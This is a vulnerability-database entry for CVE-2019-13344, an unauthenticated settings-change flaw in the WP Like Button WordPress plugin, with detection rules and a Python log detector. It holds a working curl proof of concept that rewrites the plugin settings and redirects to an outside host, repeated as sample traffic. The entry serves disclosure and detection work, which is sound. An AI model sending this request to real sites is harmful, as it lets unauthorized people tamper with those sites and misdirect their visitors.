CVE-2019-13344
published 2019-07-05

Priority: P3 (55) · Severity: medium · CVSS 3.0 base score: 5.3
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:L / A:N
Exploit: public PoC available
EPSS: 45.09% (98.6th percentile)
An authentication bypass vulnerability in the CRUDLab WP Like Button plugin through 1.6.0 for WordPress allows unauthenticated attackers to change settings. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update settings, as demonstrated by the wp-admin/admin.php?page=facebook-like-button each_page_url or code_snippet parameter.

Affected

1 range
Vendor: crudlab · Product: wp_like_button · Version range: <= 1.6.0 · Fixed in: none at time of disclosure

Detection & IOCs (extracted from sources)

url: https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1
path: /wp-admin/admin.php?page=facebook-like-button
filename: wp_like_button.php
command: curl -k -i --raw -X POST -d "page=facebook-like-button&site_url=https%3A%2F%2Flocalhost%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%3C%3Fphp+echo+fb_like_button()%3B+%3F%3E&beforeafter=before&eachpage=url&each_page_url=https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb=" "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button"
(The command as extracted from the source PoC doubled every % as %%, a printf-style escape that curl would send literally, and omitted the target URL; both are normalised here, with the URL taken from the path IOC above. Note that the request carries no Cookie header and no WordPress nonce.)
  • Detect unauthenticated POST requests to the WP Like Button settings page: any POST to /wp-admin/admin.php?page=facebook-like-button that carries no WordPress login cookie (wordpress_logged_in_*) should be flagged as exploitation of CVE-2019-13344. WordPress still redirects such a request to wp-login.php, so a 302 in the response is not evidence that the settings update failed; the request itself is the indicator.
  • Alert on POST requests containing the parameter 'update_fblb' in the body targeting /wp-admin/admin.php?page=facebook-like-button; this is the trigger parameter the vulnerable plugin uses to save settings. On its own it also matches legitimate saves by an administrator, so pair it with the missing-session check above.
  • Monitor for the 'code_snippet' POST parameter being set to PHP code (e.g. containing '<?php') in requests to the WP Like Button admin page, which could indicate an attacker injecting code via the unauthenticated settings update. The PoC above sets this parameter to '<?php echo fb_like_button(); ?>', so a plain '<?php' match catches it; compare the submitted value against the site's stored setting to cut noise from ordinary admin saves.
  • The vulnerable code path is the contains() function in wp_like_button.php; source code review or file integrity monitoring of this file can confirm whether an authorization check (for example current_user_can() or a nonce check) is present or absent.
  • The vulnerability affects WP Like Button plugin version 1.6.0 and below (including 1.5.0). The vendor released v1.6.0 but did not fix the issue; no patched version was available at the time of disclosure. Detections should target all installs up to and including v1.6.0.
  • The exploit requires no authentication whatsoever: the POST request needs neither a session cookie nor a nonce, making it trivially exploitable by any unauthenticated remote attacker.
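The rules above, applied to request records, as an added example that is not code from this page or from the WP Like Button plugin. It assumes a reverse proxy or WAF log that preserves method, URL, cookies and the urlencoded POST body (the record shape and field names are hypothetical), and it uses the WordPress `wordpress_logged_in_*` cookie as the authenticated-session signal. The sample traffic is constructed; its PoC body mirrors the curl command in the IOC list with the doubled `%%` escapes collapsed so that it URL-decodes. Beyond the bullets, it also flags an `each_page_url` that points off-site, which is what the PoC's `https://hijack.com` value does.

```python
"""Detection logic for CVE-2019-13344 (WP Like Button <= 1.6.0).

Added example, not code from the page or the plugin. Assumed input record
(hypothetical; adapt to your proxy/WAF log format):
    {"method": str, "url": str, "cookies": {name: value}, "body": urlencoded str}
"""
from urllib.parse import parse_qs, urlparse

ADMIN_PATH = "/wp-admin/admin.php"
VULN_PAGE = "facebook-like-button"
# WordPress names its session cookie wordpress_logged_in_<hash>; its presence
# is the "valid authenticated session" signal the first detection rule needs.
LOGIN_COOKIE_PREFIX = "wordpress_logged_in_"


def analyze(req, stored_snippet=None):
    """Return {"exploit": bool, "indicators": [...]} for one request record.

    exploit    : POST to the plugin's settings page with no logged-in cookie
    indicators : secondary signals: the update_fblb save trigger, PHP in
                 code_snippet (unless it equals stored_snippet, the value the
                 site already has), and each_page_url pointing off-site
    """
    out = {"exploit": False, "indicators": []}
    if req.get("method", "").upper() != "POST":
        return out
    url = urlparse(req.get("url", ""))
    if not url.path.endswith(ADMIN_PATH):
        return out
    body = parse_qs(req.get("body", ""), keep_blank_values=True)
    query = parse_qs(url.query, keep_blank_values=True)
    # The PoC sends page= in the body; the admin UI puts it in the query string.
    page = (body.get("page") or query.get("page") or [""])[0]
    if page != VULN_PAGE:
        return out

    cookies = req.get("cookies") or {}
    authed = any(name.startswith(LOGIN_COOKIE_PREFIX) for name in cookies)
    out["exploit"] = not authed

    if "update_fblb" in body:
        out["indicators"].append("update_fblb")

    snippet = body.get("code_snippet", [""])[0]
    if "<?php" in snippet.lower() and snippet != stored_snippet:
        out["indicators"].append("php_in_code_snippet")

    target_host = urlparse(body.get("each_page_url", [""])[0]).hostname
    if target_host and target_host != url.hostname:
        out["indicators"].append("offsite_each_page_url")
    return out


def scan(records, stored_snippet=None):
    """Run analyze() over many records; return (index, result) for hits only."""
    hits = []
    for i, rec in enumerate(records):
        res = analyze(rec, stored_snippet)
        if res["exploit"] or res["indicators"]:
            hits.append((i, res))
    return hits


# Constructed sample traffic (not real logs). POC_BODY mirrors the page's curl
# command with its doubled %% escapes collapsed to single % so it URL-decodes.
POC_BODY = (
    "page=facebook-like-button&site_url=https%3A%2F%2Flocalhost%2Fwp"
    "&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1"
    "&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image="
    "&code_snippet=%3C%3Fphp+echo+fb_like_button()%3B+%3F%3E"
    "&beforeafter=before&eachpage=url&each_page_url=https://hijack.com"
    "&language=en_US&width=65&position=center&layout=box_count"
    "&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
)
POC_REQUEST = {  # unauthenticated: no cookies at all, exactly as in the PoC
    "method": "POST",
    "url": "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button",
    "cookies": {},
    "body": POC_BODY,
}
LEGIT_REQUEST = {  # an administrator saving settings from the real UI
    "method": "POST",
    "url": "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button",
    "cookies": {"wordpress_logged_in_0123abcd": "admin|9999999999|x|y"},
    "body": "page=facebook-like-button&eachpage=url"
            "&each_page_url=https%3A%2F%2Flocalhost%2Fwp%2F&update_fblb=",
}
VIEW_REQUEST = {  # merely opening the settings page: not a save, not flagged
    "method": "GET",
    "url": "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1",
    "cookies": {"wordpress_logged_in_0123abcd": "admin|9999999999|x|y"},
    "body": "",
}

if __name__ == "__main__":
    for idx, res in scan([POC_REQUEST, LEGIT_REQUEST, VIEW_REQUEST]):
        print(idx, res)
```

The PoC record scores as exploitation with all three secondary indicators; the administrator's save is not exploitation but still shows the `update_fblb` trigger, which is why that rule alone is too noisy to page on. Passing the site's stored `code_snippet` as `stored_snippet` suppresses the PHP indicator when the submitted value is unchanged, so only actual snippet modifications surface.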

CVSS provenance

NVD v3.0: 5.3 MEDIUM  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
NVD v2.0: 5.0 MEDIUM  AV:N/AC:L/Au:N/C:N/I:P/A:N